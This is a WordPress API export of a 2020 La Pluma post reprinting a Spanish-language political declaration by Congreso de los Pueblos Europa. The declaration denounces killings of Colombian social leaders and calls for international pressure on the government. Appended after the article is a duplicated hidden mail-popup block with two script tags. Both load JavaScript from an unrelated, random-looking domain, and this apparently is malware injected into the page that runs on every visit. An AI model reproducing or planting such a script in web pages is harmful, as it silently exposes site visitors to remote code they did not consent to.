{"id":21643,"date":"2020-10-13T17:08:39","date_gmt":"2020-10-13T17:08:39","guid":{"rendered":"http:\/\/www.lapluma.net\/?p=21643"},"modified":"2020-10-14T17:09:52","modified_gmt":"2020-10-14T17:09:52","slug":"declaracion-politica-quinta-asamblea-congreso-de-los-pueblos-capitulo-europa-por-la-vida-la-dignidad-y-el-territorio-solidaridad-entre-los-pueblos","status":"publish","type":"post","link":"https:\/\/www.lapluma.net\/fr\/2020\/10\/13\/declaracion-politica-quinta-asamblea-congreso-de-los-pueblos-capitulo-europa-por-la-vida-la-dignidad-y-el-territorio-solidaridad-entre-los-pueblos\/","title":{"rendered":"Declaraci\u00f3n pol\u00edtica: Quinta Asamblea Congreso de los Pueblos Cap\u00edtulo Europa \u201cPor la vida, la dignidad y el territorio: solidaridad entre los pueblos\u201d"},"content":{"rendered":"<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" src=\"http:\/\/tlaxcala-int.org\/upload\/aut_7471.jpg\" width=\"215\" height=\"82\" \/>Nosotros congresistas populares de Alemania, B\u00e9lgica, Espa\u00f1a, Francia, Pa\u00eds Vasco, Suecia y Suiza quienes nos encontramos sesionando de manera virtual saludamos los diez a\u00f1os de conformaci\u00f3n del Congreso de los Pueblos y muy especialmente a <b>la Minga Social y Comunitaria por la vida, el territorio, la democracia y<\/b> <b>la paz<\/b>, actualmente en proceso. Desde la Quinta Asamblea del Congreso de los pueblos Europa, espacio de<b> <\/b>debate, reflexi\u00f3n y decisiones en torno a nuestro compromiso con el pa\u00eds, <b>expresamos:<\/b><\/span><\/p>\n<div>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\"><b>Nuestra denuncia y rechazo <\/b>al proceso genocida que se viene adelantado en Colombia contra las<b> <\/b>comunidades ind\u00edgenas, afrodescendientes, campesinas y sectores populares. Sus l\u00edderes y lideresas sociales y defensores y defensoras de derechos humanos que est\u00e1n siendo exterminados en decenas de masacres y cientos de asesinatos selectivos ocurridos en el pa\u00eds. En efecto, la \u00e9poca de pandemia global ha sido aprovechada por el gobierno guerrerista de la extrema derecha para acometer la exclusi\u00f3n social y desarrollar su proyecto de muerte que desconoce nuestro derecho al territorio que se inscribe en una ecolog\u00eda respetuosa de la vida.<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" aligncenter\" src=\"http:\/\/www.tlaxcala-int.org\/upload\/gal_23389.jpg\" width=\"606\" height=\"346\" \/><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\"><b>Observamos <\/b>la responsabilidad del Estado en este Genocidio por acci\u00f3n y por omisi\u00f3n en la connivencia,<b> <\/b>tolerancia, promoci\u00f3n y apoyo al paramilitarismo y a las bandas criminales. La impunidad en los cr\u00edmenes cometidos, la persecuci\u00f3n, la estigmatizaci\u00f3n e incremento de los niveles de represi\u00f3n a la lucha social y a la disidencia democr\u00e1tica hacen parte de la estrategia de las elites en el poder para acallar al pueblo colombiano. Sin duda podemos hablar de la instauraci\u00f3n de un Estado totalitario con rostro fascista.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\"><b>Nuestra <\/b>enorme preocupaci\u00f3n con el hecho de que en lugar de procesar a los verdaderos responsables del<b> <\/b>genocidio en Colombia, las instituciones del Estado lo desconocen abiertamente y permiten la continuidad de la implementaci\u00f3n del proyecto genocida, profundizando los niveles de impunidad ya existentes. Por ello, reiteramos el respaldo a la labor del movimiento social, el trabajo de las organizaciones de derechos humanos y de los l\u00edderes pol\u00edticos que como Iv\u00e1n Cepeda, Gustavo Petro, Alberto Castilla y tantos otros y otras, que han denunciado los cr\u00edmenes de Estado y la represi\u00f3n.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Nosotros congresistas reunidos y reunidas, llamamos al pueblo colombiano a rodearlos de nuestra solidaridad y apoyo. Nos preocupan particularmente los ataques jur\u00eddicos en las cortes nacionales y de Estados Unidos, ataques que solo tienen por objetivo acallar las voces de la disidencia que, en un Estado democr\u00e1tico, deber\u00edan tener plenas garant\u00edas de expresi\u00f3n y participaci\u00f3n pol\u00edtica<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\"><b>Finalmente, hacemos un llamado <\/b>a la comunidad Internacional para que adopte una posici\u00f3n cr\u00edtica que<b> <\/b>investigue y sancione la responsabilidad del Estado en el proceso de genocidio y de perpetraci\u00f3n de cr\u00edmenes de lesa humanidad y su responsabilidad en la exacerbaci\u00f3n de la guerra. As\u00ed tambi\u00e9n, llamamos a que asuma una postura similar sobre los acuerdos comerciales con Colombia, y que estos se detengan mientras no existan garant\u00edas plenas para que este genocidio pare. Igualmente, instamos a la comunidad internacional para que exija al gobierno colombiano reanudar los di\u00e1logos con el ELN y cumplir los acuerdos que ha suscrito con las FARC y con el movimiento social.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Nosotros, congresistas populares con nuestro quehacer y diplomacia para la construcci\u00f3n de poder popular tambi\u00e9n hacemos parte comprometida de las luchas que a nivel global vienen gestando los pueblos despose\u00eddos del mundo y reiteramos nuestro compromiso a continuar en la construcci\u00f3n del internacionalismo solidario, dialogo y diplomacia popular.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\"><em><b>Congreso de los Pueblos Europa, 11 de octubre 11 de 2020<\/b><\/em><\/span><\/p>\n<p><strong><span class=\"auteur\" style=\"font-size: 14pt;\">Congreso de los Pueblos-Europa<\/span><\/strong><\/p>\n<p><strong><span style=\"font-size: 14pt;\">Fuente: <a href=\"http:\/\/tlaxcala-int.org\/article.asp?reference=29817\">Tlaxcala <\/a>La Pluma, 12 de octubre de 2020<\/span><\/strong><\/p>\n<\/div>\n<div id=\"ffenetremailtomailModal\" style=\"z-index: 20002;\">\n<div id=\"ffenetremailtopopupModalMail\">\n<div id=\"ffenetremailtotoModalClose\"><\/div>\n<div id=\"ffenetremailtopopupQuestion\">What do you want to do ?<\/div>\n<p><a id=\"ffenetremailtoemailOpen\"><\/a>New mail<button id=\"ffenetremailtobuttonEmail\">Copy<\/button><textarea id=\"ffenetremailtotextArea\"><\/textarea><\/p>\n<\/div>\n<\/div>\n<div><img \/><\/div>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n<div id=\"ffenetremailtomailModal\" style=\"z-index: 20002;\">\n<div id=\"ffenetremailtopopupModalMail\">\n<div id=\"ffenetremailtotoModalClose\"><\/div>\n<div id=\"ffenetremailtopopupQuestion\">What do you want to do ?<\/div>\n<p><a id=\"ffenetremailtoemailOpen\"><\/a>New mail<button id=\"ffenetremailtobuttonEmail\">Copy<\/button><textarea id=\"ffenetremailtotextArea\"><\/textarea><\/div>\n<\/div>\n<div><img \/><\/div>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Nosotros congresistas populares de Alemania, B&eacute;lgica, Espa&ntilde;a, Francia, Pa&iacute;s Vasco, Suecia y Suiza quienes nos encontramos sesionando de manera virtual saludamos los diez a&ntilde;os de conformaci&oacute;n del Congreso de los Pueblos y muy especialmente a la Minga Social y Comunitaria por la vida, el territorio, la democracia y la paz, actualmente en proceso. Desde la&#8230;<\/p>\n","protected":false},"author":723,"featured_media":21644,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"footnotes":""},"categories":[217],"tags":[65,10981,10984,10983,10982],"coauthors":[10980],"class_list":["post-21643","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-abya-yala","tag-abya-yala","tag-congreso-de-los-pueblos-europa","tag-emigrados-y-exiliados-colombianos","tag-minga-popular","tag-paz-con-justicia"],"translation":{"provider":"WPGlobus","version":"2.12.2","language":"fr","enabled_languages":["es","fr"],"languages":{"es":{"title":true,"content":true,"excerpt":false},"fr":{"title":false,"content":false,"excerpt":false}}},"_links":{"self":[{"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/posts\/21643","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/users\/723"}],"replies":[{"embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/comments?post=21643"}],"version-history":[{"count":3,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/posts\/21643\/revisions"}],"predecessor-version":[{"id":21648,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/posts\/21643\/revisions\/21648"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/media\/21644"}],"wp:attachment":[{"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/media?parent=21643"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/categories?post=21643"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/tags?post=21643"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/coauthors?post=21643"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}